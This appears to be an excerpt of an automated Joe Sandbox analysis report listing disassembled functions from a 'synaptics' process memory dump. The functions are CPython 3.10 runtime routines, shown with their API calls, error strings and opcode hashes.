                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format$CallCauseFromMakeObject_TstateTuple_
                                                                                                                                                                                                      • String ID: %R returned NULL without setting an exception$%R returned a result with an exception set
                                                                                                                                                                                                      • API String ID: 204735166-2074375803
                                                                                                                                                                                                      • Opcode ID: ececf857276e1e6780032555e8133a3e48af6dcc717a72f12481bdccf8f70f61
                                                                                                                                                                                                      • Instruction ID: 7a05707caa2473f60fc357e2c138ead5e2af6b2ae32681fa6e2c0c56f03c84b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ececf857276e1e6780032555e8133a3e48af6dcc717a72f12481bdccf8f70f61
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6331F1722042019BDB00CE5ADC40DABB7A9EB8532AF140669F928C7B50E731D926CBE1
                                                                                                                                                                                                      Function 6C4702E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%s() method: bad call flags,00000001,?,?,?,6C4BC1C1,?,?), ref: 6C470342
                                                                                                                                                                                                      • PyType_GenericAlloc.PYTHON310(?,00000000,?,?,?,?,6C4BC1C1,?,?), ref: 6C470370
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?,?,?,?,?,?,?,?,00000000), ref: 6C47038D
                                                                                                                                                                                                      • PyUnicode_InternInPlace.PYTHON310(?,?,?,?,?,?,?,?,?,00000000), ref: 6C4703A5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s() method: bad call flags, xrefs: 6C470337
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unicode_$AllocErr_FormatFromGenericInternPlaceStringType_
                                                                                                                                                                                                      • String ID: %s() method: bad call flags
                                                                                                                                                                                                      • API String ID: 1801730981-3410074680
                                                                                                                                                                                                      • Opcode ID: e1c4c418db393ed8dfce8ff10657351ebd5f1d2039493be8278f4012f843f10d
                                                                                                                                                                                                      • Instruction ID: 32b5184303cbf567863bb511c5d3c4c06d79a3a51ad0f7e4aa5ba3006435a948
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1c4c418db393ed8dfce8ff10657351ebd5f1d2039493be8278f4012f843f10d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C43108729072419BD730CF7AD8C1FC9B7E4FB4122AF148626D458CBF14D236D50587A0
                                                                                                                                                                                                      Function 6C4681A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyObject_GetAttrString.PYTHON310(?,?), ref: 6C4681BB
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,attribute of type '%.200s' is not callable,?), ref: 6C4681E1
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C46822D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C468221
                                                                                                                                                                                                      • attribute of type '%.200s' is not callable, xrefs: 6C4681D5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_String$AttrFormatObject_
                                                                                                                                                                                                      • String ID: attribute of type '%.200s' is not callable$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 4198255297-1575836955
                                                                                                                                                                                                      • Opcode ID: b25df3953cf554692a83ef7ca2fb6e9446198e8efa7b75e706c26e3057c9016b
                                                                                                                                                                                                      • Instruction ID: d55ae0090bb8feab871f192b7b40b40eea6d1e32e6f8930fda73ca258278f793
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b25df3953cf554692a83ef7ca2fb6e9446198e8efa7b75e706c26e3057c9016b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C11E9327005049BDB00CE96DD00FAB73B9BBC177AF140129E91887F55EB35E856DBA1
                                                                                                                                                                                                      Function 6C473BB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000645), ref: 6C473BDE
                                                                                                                                                                                                      • PyObject_Hash.PYTHON310(00000000,00000000), ref: 6C473C02
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C473BCD
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C473BD2
                                                                                                                                                                                                      • @Btl, xrefs: 6C473BF0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatHashObject_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$@Btl$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 896634218-1953751630
                                                                                                                                                                                                      • Opcode ID: e318668c350588cfea6c82f5ef44b0795b02bb76cc72a1158bd7e23a0b912831
                                                                                                                                                                                                      • Instruction ID: 7190c74c801431ffa5edbc7c4616354e7c407e07ec1d2bbffb7444567ea6490a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e318668c350588cfea6c82f5ef44b0795b02bb76cc72a1158bd7e23a0b912831
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2901F5777401086F8A20DAAABC01ECA77399B8133AF044725F62C87F91E731E49596F1
                                                                                                                                                                                                      Function 6C587790 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 244COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_New.PYTHON310(00000001,00000000), ref: 6C5879B2
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000), ref: 6C587B26
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_MemoryUnicode_
                                                                                                                                                                                                      • String ID: ( ) $HRpl
                                                                                                                                                                                                      • API String ID: 3441573444-356350071
                                                                                                                                                                                                      • Opcode ID: f26febb2fd0fde69f96ebbf1da901c40d0fbb7bf575d2bc26788bac6005e3e4d
                                                                                                                                                                                                      • Instruction ID: 1236ac12cfca7ba760376b39371a767202defa099c1511549575354daca7d0aa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f26febb2fd0fde69f96ebbf1da901c40d0fbb7bf575d2bc26788bac6005e3e4d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19A18B716093108FD711CF24C94179ABBF1FB85359F148A2EE8998BBA1E7749984CF82
                                                                                                                                                                                                      Function 6C4734C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000,?,00000000,00000000,?,?,?,?,?,?,6C476234), ref: 6C4734E3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Memory
                                                                                                                                                                                                      • String ID: @xJl$@xJlr
                                                                                                                                                                                                      • API String ID: 581423314-2718653720
                                                                                                                                                                                                      • Opcode ID: d5e61e811b4f72886076326a4c3aa7df6ea69f13024f47c45f4d765cb7efb1f2
                                                                                                                                                                                                      • Instruction ID: d388fb4093c2bea2dc8989dc3ac93eda6bd80e5a82b210251bea720dc0fe5785
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5e61e811b4f72886076326a4c3aa7df6ea69f13024f47c45f4d765cb7efb1f2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D481C071A042028FC724CF18C580EAAB7F1FF85329F1586BDE4599B751D731E84ACBA2
                                                                                                                                                                                                      Function 6C472460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.VCRUNTIME140(00000014,000000FF,00000000), ref: 6C472531
                                                                                                                                                                                                      • memset.VCRUNTIME140(-00000014,00000000,?), ref: 6C47256C
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000,?,?,?), ref: 6C472588
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memset$Err_Memory
                                                                                                                                                                                                      • String ID: VUUU
                                                                                                                                                                                                      • API String ID: 6972278-2040033107
                                                                                                                                                                                                      • Opcode ID: 6630b722953793c9f6226be477040d0c628f8fc8b50d3e33a4b78dcd7835501c
                                                                                                                                                                                                      • Instruction ID: 44ecb228f2a3bc6a71cc9526a11e5a4e98d9a78881475d1663c42c63e6083daf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6630b722953793c9f6226be477040d0c628f8fc8b50d3e33a4b78dcd7835501c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1931F772A047068BD330CF68DC85F9AB7E8FB80365F14093ED559C7B90EB70E95886A1
                                                                                                                                                                                                      Function 6C4A0230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyCMethod_New.PYTHON310(6C4A08CA,?,00000000,00000000,?,00000000,?,?,?,6C4A08CA), ref: 6C4A025B
                                                                                                                                                                                                        • Part of subcall function 6C49F090: _PyErr_SetString.PYTHON310(00000000,6C73C9A8,attempting to create PyCMethod with a METH_METHOD flag but no class,00000000,?,00000000,?,?,6C5536A7,6C74DD84,00000000,00000000,00000000,00000001), ref: 6C49F13B
                                                                                                                                                                                                      • PyObject_SetAttrString.PYTHON310(?,6C4A08CA,00000000,?,?,6C4A08CA), ref: 6C4A0271
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000,?,6C4A08CA), ref: 6C4A02E8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • module functions cannot set METH_CLASS or METH_STATIC, xrefs: 6C4A02D2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_String$AttrMethod_ObjectObject_
                                                                                                                                                                                                      • String ID: module functions cannot set METH_CLASS or METH_STATIC
                                                                                                                                                                                                      • API String ID: 2973665852-1035500263
                                                                                                                                                                                                      • Opcode ID: 9c14f2688dc0b7e4479a50c5261ad501dbe52f118f170073663cb5b6539c863a
                                                                                                                                                                                                      • Instruction ID: 5ffecaa462eec159b72a00b3c3b0114abc35a31ca7f5d736843b8a17797e799c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c14f2688dc0b7e4479a50c5261ad501dbe52f118f170073663cb5b6539c863a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F2126726052015BE7008EAAAC81F62B3E8DF91339F140279FD2CC7B91EB61EC528791
                                                                                                                                                                                                      Function 6C583DC0 Relevance: 6.0, APIs: 4, Instructions: 41stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_Ready.PYTHON310(?), ref: 6C583DC9
                                                                                                                                                                                                      • strrchr.VCRUNTIME140(?,0000002E), ref: 6C583DE1
                                                                                                                                                                                                      • PyModule_AddObjectRef.PYTHON310(?,?,?), ref: 6C583DF6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Module_ObjectReadyType_strrchr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1700563459-0
                                                                                                                                                                                                      • Opcode ID: 67392aedb3786ad00b02d00170974e151ae1868a98c6707ef216335fb01593c6
                                                                                                                                                                                                      • Instruction ID: 07fbe1a84a04acf44bd7f43e1b01302725ddef74043ad9ce8ab01350e961ee5b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67392aedb3786ad00b02d00170974e151ae1868a98c6707ef216335fb01593c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF0A7B7A065287FEA001A55FC02DE73B9CDF412BAF044135FD1DC6651F723A92482E5
                                                                                                                                                                                                      Function 6C4AD2D0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_EQ.PYTHON310(?,00000000,?,?), ref: 6C4AD34B
                                                                                                                                                                                                      • PyObject_RichCompare.PYTHON310(?,00000000,00000002,?,?), ref: 6C4AD364
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
